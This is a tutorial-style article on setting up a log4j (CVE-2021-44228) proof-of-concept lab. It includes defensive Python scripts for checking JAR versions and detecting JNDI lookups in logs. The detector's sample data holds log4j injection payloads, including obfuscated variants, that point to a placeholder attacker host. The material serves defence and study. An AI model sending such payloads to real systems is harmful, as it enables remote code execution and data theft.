How to set up a PoC environment to study the log4j vulnerability and protect your own Apps

Building a PoC for the log4j vulnerability and its possible attacks is critical for your teams to study and research vulnerabilities and malware, so that they can come up with effective security controls. It would also contribute to the secure-by-design initiative inside your organization.

Adam Alinsky 🦋, Digital Transformation Expert, Jan 10th, 2022

    Overview


    The Apache Log4j 2 utility is a Java-based logging utility commonly used for logging API/web requests. On December 9th, 2021, a vulnerability (CVE-2021-44228) was reported that could allow a system running Apache Log4j 2 version 2.14.1 or below to be compromised. This article has three parts:

    • Part I: log4j Vulnerability Overview & PoC
    • Part II: Possible Attacks on Data
    • Part III: Changing App Infrastructure Design to be Secure by Design

    These three parts should help your teams (product, security, red team, blue team, etc.) study the log4j vulnerability and expose security weaknesses within your Apps and infrastructure.
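As an added example (not code from this article or from the Log4jShellPoC repository), here is a Python check you can run over a log4j-core JAR from your own build artifacts. It reads the version from the Maven pom.properties entry, compares it against the 2.14.1 boundary stated in the overview, and also reports whether the JndiLookup class is still present, since removing that class was the interim mitigation for deployments that could not be upgraded immediately. The JAR the block builds is a constructed fixture, and the special handling of the 2.3.x and 2.12.x branches reflects the patched backport releases (2.3.1 and 2.12.2) that were later published for older Java versions.

```python
import io
import re
import zipfile

# Entries of interest inside a log4j-core JAR. Both paths follow the standard
# Maven/Log4j layout; nothing here is specific to this article's PoC.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(version: str) -> tuple:
    """Reduce '2.14.1' to (2, 14, 1). Pre-release tags such as '-beta9' are
    folded into the numeric tuple, which is good enough for a range check."""
    parts = [int(n) for n in re.findall(r"\d+", version)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_vulnerable_version(version: str) -> bool:
    """True if the version is in the CVE-2021-44228 range the article gives
    (Log4j 2 up to and including 2.14.1), excluding the patched backports."""
    v = parse_version(version)
    if v < (2, 0, 0) or v > (2, 14, 1):
        return False
    # The Java 6 (2.3.x) and Java 7 (2.12.x) maintenance branches received fixes of their own.
    if v[:2] == (2, 3) and v >= (2, 3, 1):
        return False
    if v[:2] == (2, 12) and v >= (2, 12, 2):
        return False
    return True


def log4j_core_version(jar_bytes: bytes):
    """Return the version recorded in pom.properties, or None if the archive is
    not log4j-core (or is a shaded JAR that dropped the Maven metadata)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        if POM_PROPERTIES not in zf.namelist():
            return None
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return None


def scan_jar(jar_bytes: bytes) -> dict:
    """Summarise one JAR: detected version, whether it is in the vulnerable
    range, and whether the JNDI lookup class is still shipped in it."""
    version = log4j_core_version(jar_bytes)
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        jndi_present = JNDI_LOOKUP_CLASS in zf.namelist()
    return {
        "version": version,
        "vulnerable_version": version is not None and is_vulnerable_version(version),
        "jndi_lookup_class_present": jndi_present,
    }


def build_fake_jar(version: str, include_jndi_class: bool = True) -> bytes:
    """Constructed test fixture: a minimal archive carrying only the entries the
    scanner inspects. Real log4j-core JARs contain hundreds of classes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            POM_PROPERTIES,
            f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n",
        )
        if include_jndi_class:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")  # content is irrelevant to the presence check
    return buf.getvalue()


if __name__ == "__main__":
    # Walk a few constructed fixtures; on a real host, feed it the bytes of each JAR found on disk.
    for ver, keep_class in (("2.14.1", True), ("2.14.1", False), ("2.12.2", True), ("2.15.0", True)):
        print(ver, scan_jar(build_fake_jar(ver, keep_class)))
```

A JAR that reports a vulnerable version but no JndiLookup class has had the class-removal workaround applied; treat it as an upgrade still owed rather than as fixed, because the workaround only addresses the lookup path this article discusses.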

    log4j Vulnerability Overview

    The Log4j vulnerability allows an attacker to deploy and run malware on the JVM of the compromised system by exploiting the log4j JNDI Lookup feature. This kind of attack is known as Remote Code Execution (RCE). The malware establishes a connection (a reverse shell) to the attacker's botnet master server, allowing the botnet master to execute commands on the compromised system. If the compromised system has access to data, the organization ends up with a data breach or a ransomware infection.
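As an added example (not part of the article or its PoC repository), the following Python detection logic runs over a few constructed access-log lines and flags requests whose User-Agent carries a JNDI lookup of the kind described above. Before checking, it collapses the literal-producing lookups (`${lower:...}`, `${upper:...}` and the default-value form `${...:-...}`) that the Log4j lookup engine would resolve first, so the check sees the string the logger would actually evaluate rather than the raw bytes. The sample lines, hostnames and addresses are constructed placeholders.

```python
import re

# Lookups that only produce literal text, which the Log4j engine resolves
# before any outer lookup runs. Folding them first keeps the check honest
# against split-up spellings of the same lookup.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _fold_case(match) -> str:
    text = match.group(2)
    return text.lower() if match.group(1).lower() == "lower" else text.upper()


def collapse_lookups(text: str) -> str:
    """Repeatedly resolve innermost literal-producing lookups until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(_fold_case, text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def is_jndi_lookup(text: str) -> bool:
    """True when the text, once collapsed, contains a ${jndi: lookup."""
    return _JNDI_LOOKUP.search(collapse_lookups(text)) is not None


def scan_log_lines(lines):
    """Return (line number, line) for every line that carries a JNDI lookup."""
    return [(n, line) for n, line in enumerate(lines, start=1) if is_jndi_lookup(line)]


# Constructed sample lines, not taken from the article: an access log whose
# User-Agent header is written through Log4j 2. Hosts and IPs are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 "GET /api/login HTTP/1.1" 200 ua="Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 "GET /api/login HTTP/1.1" 200 ua="${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 "GET /api/login HTTP/1.1" 200 ua="${${lower:J}ndi:ldap://attacker.example/a}"',
    '10.0.0.9 "GET /api/login HTTP/1.1" 200 ua="${${::-j}ndi:rmi://attacker.example/b}"',
    '10.0.0.7 "GET /docs?q=${date:yyyy} HTTP/1.1" 200 ua="curl/7.79.1"',
    '10.0.0.7 "GET /docs HTTP/1.1" 200 ua="${env:HOME:-/root}"',
]

if __name__ == "__main__":
    for number, line in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup -> {collapse_lookups(line)}")
```

Lines 5 and 6 contain lookups but no JNDI reference and are left alone, which is the point of collapsing first: a plain `${` match would drown a blue team in noise, while a plain `${jndi:` match would miss the resolved form. Feed the scanner your own App API logs (or the JSON they are shipped as) to confirm whether the PoC requests from the attacker network are visible in your monitoring.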


    Proof of Concept (PoC) Environment

    The PoC environments are built on AWS using CloudFormation, as this is the easiest and safest way to deploy a real environment away from your current controlled environment, where you can study and research vulnerabilities and malware and come up with effective controls. In this PoC, I have built two totally separate environments:

    1. Your Network Infrastructure: where an App API with the log4j vulnerability is deployed. In this PoC we have chosen an identity REST API that connects to OpenLDAP to authenticate users and issues a JWT on successful authentication.
    2. Attacker Network Infrastructure: where the attack (planting the malware in a multi-step process) takes place.

    (Illustration: the two PoC environments on AWS)

    To build the stack above in AWS, follow the README in the Log4jShellPoC repository on GitHub.

    App API Machine Software Stack

    (Illustration: App API Machine Software Stack)

    The vulnerable App REST API authenticates users and, upon successful authentication, generates a token (JWT) and sends it back to be used to securely identify and authorize users in the subsequent REST API calls. As you can see from the illustration above, the software stack of the vulnerable App REST API is composed of the REST API itself (App API), running on a JVM and authenticating users against OpenLDAP.

    OpenLDAP is where all the registered customer data lives. That data is PII (Personally Identifiable Information) and would be a very attractive prize for any intruder who manages to gain unauthorised, untracked access to it.

    As mentioned above, in Part II of this article we will go through the possible attacks on this kind of data and explore how an attacker can circumvent the controls in place to extract and transmit the data out of the system.

    Quick Demo Video

    In Part II of this article, I will go through the possible attacks on data in more detail.

    Conclusion & Takeaways

    Building a PoC for the log4j vulnerability and its possible attacks is critical for your teams to study and research vulnerabilities and malware, so that they can come up with effective security controls. It would also contribute to the secure-by-design initiative inside your organization.

    Notice of Non-Affiliation and Disclaimer: The author of the article is not affiliated, associated, authorized, endorsed by, or in any way officially connected with any of the product vendors (Amazon AWS, etc.) mentioned in this article, or any of its subsidiaries or its affiliates.



    About the Author

    Adam Alinsky 🦋, Digital Transformation Expert

    Adam is an End-2-End Solution Architect & Digital Transformation (DX) Expert across several verticals. He has more than 20 years of experience in the design, development and integration of end-2-end robust solutions, with particular attention to security (APIs & Apps), high performance, scalability and high availability.
